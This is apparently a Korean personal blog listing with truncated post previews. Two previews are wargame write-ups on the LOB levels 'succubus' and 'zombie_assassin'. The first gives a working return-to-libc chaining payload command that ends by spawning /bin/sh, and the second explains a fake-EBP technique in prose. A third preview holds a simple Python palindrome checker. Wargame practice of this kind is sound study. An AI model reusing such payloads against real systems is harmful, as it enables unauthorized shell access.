- Today
- Total
Phantom
아 진짜 정말 죄송합니다 하지만 적당한 공격을 했고 글을 내일 다듬기로 ㅎㅎㅎㅎㅎ 이번 문제는 RTL Chaining 이다 어려울것 없다 FTZ에서 이미 RTL Chaining 로 풀엇기에 자세한 설명은 내일 쓰겠다 긱 함수의 주소를 구해서 DO GYE GUL YUT MO로 체이닝 하여 마지막에 매개변수에 /bin/sh문자열을 넣어 실행한다 ./succubus $(perl -e 'print "\x90"x44, "\xec\x87\x04\x08", "\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "\x90"x4, "\xa8\xfa\xff\xbf", "/bin/sh"') /bin/sh의 위치는 buffer 시작지점으..
아 오늘 정말 바쁘다TeamH4C 캠프 준비, 인사 시즌이라 시청 업무 도중엔 앉아있을시간도없고퇴근하자마자 노는것이 아닌 개인사정.... 오늘하루 ㅎㅎㅎ 양심을 팔아버리겠어 어차피 안올렸던거니까 ㅎㅎㅎ zombie_assassin은 간단하게 FEBP인데 페이로드는 이렇다 Leave를 한번 더 실행해서 늘린 후에 문제 코드에 의해 지워지지않은 SFP부분을 변조하여 버퍼지점으로 이동 시킨 뒤에다시 ret는 esp+4지점의 주소로 이동하여 점프하고 RTL을 사용하여 쉘을 땄다. 이제 내일 아침에 수정작업 들어가야겠다.
def reverse(text):return text[::-1] # 문자 역순 출력 def is_palindrome(text):return text == reverse(text) # 회문 판별 함수 something = raw_input("Enter text: ")new_something = something.translate(None, "[]{}:;/!@#$%^&*()_+-=?.,\'\"") # 특정 문자를 특정 문자로 변환, None는 제거new_something = new_something.lower() # 특정 문자열을 소문자로 변환print '%s'%(new_something)if is_palindrome(new_something):# 회문 판별print 'Yes, it is a palindro..